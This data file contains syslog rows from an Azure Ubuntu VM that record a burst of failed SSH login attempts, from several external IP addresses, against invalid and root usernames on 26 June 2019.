+4892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:18,UbuntuDevEnv,2019-06-26 15:06:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:20,UbuntuDevEnv,2019-06-26 15:06:19,auth,UbuntuDevEnv,info,Failed password for invalid user family from 220.134.138.111 port 51194 ssh2,17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,220.134.138.1,51194,,
+4894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:20,UbuntuDevEnv,2019-06-26 15:06:19,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 51194:11: Bye Bye [preauth],17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,51194,,
+4895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:20,UbuntuDevEnv,2019-06-26 15:06:19,auth,UbuntuDevEnv,info,Disconnected from invalid user family 220.134.138.111 port 51194 [preauth],17350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,220.134.138.1,51194,,
+4896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:35,UbuntuDevEnv,2019-06-26 15:06:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:35,UbuntuDevEnv,2019-06-26 15:06:35,auth,UbuntuDevEnv,info,Invalid user ecogs from 192.241.213.168 port 56504,17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecogs,192.241.213.1,56504,,
+4898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:35,UbuntuDevEnv,2019-06-26 15:06:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+4899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:38,UbuntuDevEnv,2019-06-26 15:06:37,auth,UbuntuDevEnv,info,Failed password for invalid user ecogs from 192.241.213.168 port 56504 ssh2,17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecogs,192.241.213.1,56504,,
+4900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:38,UbuntuDevEnv,2019-06-26 15:06:37,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 56504:11: Bye Bye [preauth],17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,56504,,
+4901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:38,UbuntuDevEnv,2019-06-26 15:06:37,auth,UbuntuDevEnv,info,Disconnected from invalid user ecogs 192.241.213.168 port 56504 [preauth],17409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecogs,192.241.213.1,56504,,
+4902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:44,UbuntuDevEnv,2019-06-26 15:06:43,auth,UbuntuDevEnv,info,Invalid user user1 from 164.132.192.219 port 54281,17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,164.132.192.2,54281,,
+4903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:44,UbuntuDevEnv,2019-06-26 15:06:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:44,UbuntuDevEnv,2019-06-26 15:06:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:46,UbuntuDevEnv,2019-06-26 15:06:45,auth,UbuntuDevEnv,info,Failed password for invalid user user1 from 164.132.192.219 port 54281 ssh2,17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,164.132.192.2,54281,,
+4906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:46,UbuntuDevEnv,2019-06-26 15:06:45,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 54281:11: Bye Bye [preauth],17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,54281,,
+4907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:06:46,UbuntuDevEnv,2019-06-26 15:06:45,auth,UbuntuDevEnv,info,Disconnected from invalid user user1 164.132.192.219 port 54281 [preauth],17453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,164.132.192.2,54281,,
+4908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:00,UbuntuDevEnv,2019-06-26 15:07:00,auth,UbuntuDevEnv,info,Invalid user test2 from 47.254.147.170 port 59310,17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test2,47.254.147.1,59310,,
+4909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:00,UbuntuDevEnv,2019-06-26 15:07:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:00,UbuntuDevEnv,2019-06-26 15:07:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:02,UbuntuDevEnv,2019-06-26 15:07:02,auth,UbuntuDevEnv,info,Failed password for invalid user test2 from 47.254.147.170 port 59310 ssh2,17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test2,47.254.147.1,59310,,
+4912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:02,UbuntuDevEnv,2019-06-26 15:07:02,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 59310:11: Bye Bye [preauth],17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,59310,,
+4913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:07:02,UbuntuDevEnv,2019-06-26 15:07:02,auth,UbuntuDevEnv,info,Disconnected from invalid user test2 47.254.147.170 port 59310 [preauth],17505,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test2,47.254.147.1,59310,,
+4914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:09,UbuntuDevEnv,2019-06-26 15:08:08,auth,UbuntuDevEnv,info,Received disconnect from 139.59.81.180 port 49030:11: Bye Bye [preauth],17752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.81.1,49030,,
+4915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:09,UbuntuDevEnv,2019-06-26 15:08:08,auth,UbuntuDevEnv,info,Disconnected from 139.59.81.180 port 49030 [preauth],17752,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.59.81.1,49030,,
+4916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:09,UbuntuDevEnv,2019-06-26 15:08:08,auth,UbuntuDevEnv,info,Invalid user www from 220.134.138.111 port 40060,17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,220.134.138.1,40060,,
+4917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:09,UbuntuDevEnv,2019-06-26 15:08:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:09,UbuntuDevEnv,2019-06-26 15:08:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:11,UbuntuDevEnv,2019-06-26 15:08:11,auth,UbuntuDevEnv,info,Failed password for invalid user www from 220.134.138.111 port 40060 ssh2,17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,220.134.138.1,40060,,
+4920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:12,UbuntuDevEnv,2019-06-26 15:08:11,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 40060:11: Bye Bye [preauth],17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,40060,,
+4921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:12,UbuntuDevEnv,2019-06-26 15:08:11,auth,UbuntuDevEnv,info,Disconnected from invalid user www 220.134.138.111 port 40060 [preauth],17743,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,220.134.138.1,40060,,
+4922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:15,UbuntuDevEnv,2019-06-26 15:08:15,auth,UbuntuDevEnv,info,Invalid user qj from 164.132.192.219 port 34607,17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qj,164.132.192.2,34607,,
+4923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:15,UbuntuDevEnv,2019-06-26 15:08:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:15,UbuntuDevEnv,2019-06-26 15:08:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:17,UbuntuDevEnv,2019-06-26 15:08:16,auth,UbuntuDevEnv,info,Failed password for invalid user qj from 164.132.192.219 port 34607 ssh2,17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qj,164.132.192.2,34607,,
+4926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:17,UbuntuDevEnv,2019-06-26 15:08:16,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 34607:11: Bye Bye [preauth],17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,34607,,
+4927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:17,UbuntuDevEnv,2019-06-26 15:08:16,auth,UbuntuDevEnv,info,Disconnected from invalid user qj 164.132.192.219 port 34607 [preauth],17778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qj,164.132.192.2,34607,,
+4928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:17,UbuntuDevEnv,2019-06-26 15:08:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40  user=root,17781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,43.229.134.4,,0,
+4929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:19,UbuntuDevEnv,2019-06-26 15:08:18,auth,UbuntuDevEnv,info,Failed password for root from 43.229.134.40 port 42696 ssh2,17781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,42696,,
+4930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:19,UbuntuDevEnv,2019-06-26 15:08:19,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 42696:11: Bye Bye [preauth],17781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,42696,,
+4931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:19,UbuntuDevEnv,2019-06-26 15:08:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 43.229.134.40 port 42696 [preauth],17781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,43.229.134.4,42696,,
+4932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:24,UbuntuDevEnv,2019-06-26 15:08:24,auth,UbuntuDevEnv,info,Invalid user monit from 43.229.134.40 port 43070,17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monit,43.229.134.4,43070,,
+4933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:24,UbuntuDevEnv,2019-06-26 15:08:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:24,UbuntuDevEnv,2019-06-26 15:08:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:26,UbuntuDevEnv,2019-06-26 15:08:25,auth,UbuntuDevEnv,info,Failed password for invalid user monit from 43.229.134.40 port 43070 ssh2,17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monit,43.229.134.4,43070,,
+4936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:26,UbuntuDevEnv,2019-06-26 15:08:26,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 43070:11: Bye Bye [preauth],17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,43070,,
+4937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:26,UbuntuDevEnv,2019-06-26 15:08:26,auth,UbuntuDevEnv,info,Disconnected from invalid user monit 43.229.134.40 port 43070 [preauth],17809,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,monit,43.229.134.4,43070,,
+4938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:31,UbuntuDevEnv,2019-06-26 15:08:31,auth,UbuntuDevEnv,info,Invalid user chiudi from 43.229.134.40 port 43442,17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiudi,43.229.134.4,43442,,
+4939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:31,UbuntuDevEnv,2019-06-26 15:08:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:31,UbuntuDevEnv,2019-06-26 15:08:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+4941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:32,auth,UbuntuDevEnv,info,Invalid user u from 47.254.147.170 port 48402,17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u,47.254.147.1,48402,,
+4942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:33,auth,UbuntuDevEnv,info,Failed password for invalid user chiudi from 43.229.134.40 port 43442 ssh2,17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiudi,43.229.134.4,43442,,
+4945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:33,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 43442:11: Bye Bye [preauth],17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,43442,,
+4946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:33,UbuntuDevEnv,2019-06-26 15:08:33,auth,UbuntuDevEnv,info,Disconnected from invalid user chiudi 43.229.134.40 port 43442 [preauth],17837,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiudi,43.229.134.4,43442,,
+4947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:35,UbuntuDevEnv,2019-06-26 15:08:34,auth,UbuntuDevEnv,info,Failed password for invalid user u from 47.254.147.170 port 48402 ssh2,17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u,47.254.147.1,48402,,
+4948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:35,UbuntuDevEnv,2019-06-26 15:08:34,auth,UbuntuDevEnv,info,Disconnected from invalid user u 47.254.147.170 port 48402 [preauth],17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u,47.254.147.1,48402,,
+4949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:35,UbuntuDevEnv,2019-06-26 15:08:34,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 48402:11: Bye Bye [preauth],17845,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,48402,,
+4950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:37,UbuntuDevEnv,2019-06-26 15:08:36,auth,UbuntuDevEnv,info,Invalid user norbert from 192.241.213.168 port 44996,17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,norbert,192.241.213.1,44996,,
+4951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:08:37,UbuntuDevEnv,2019-06-26 15:08:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
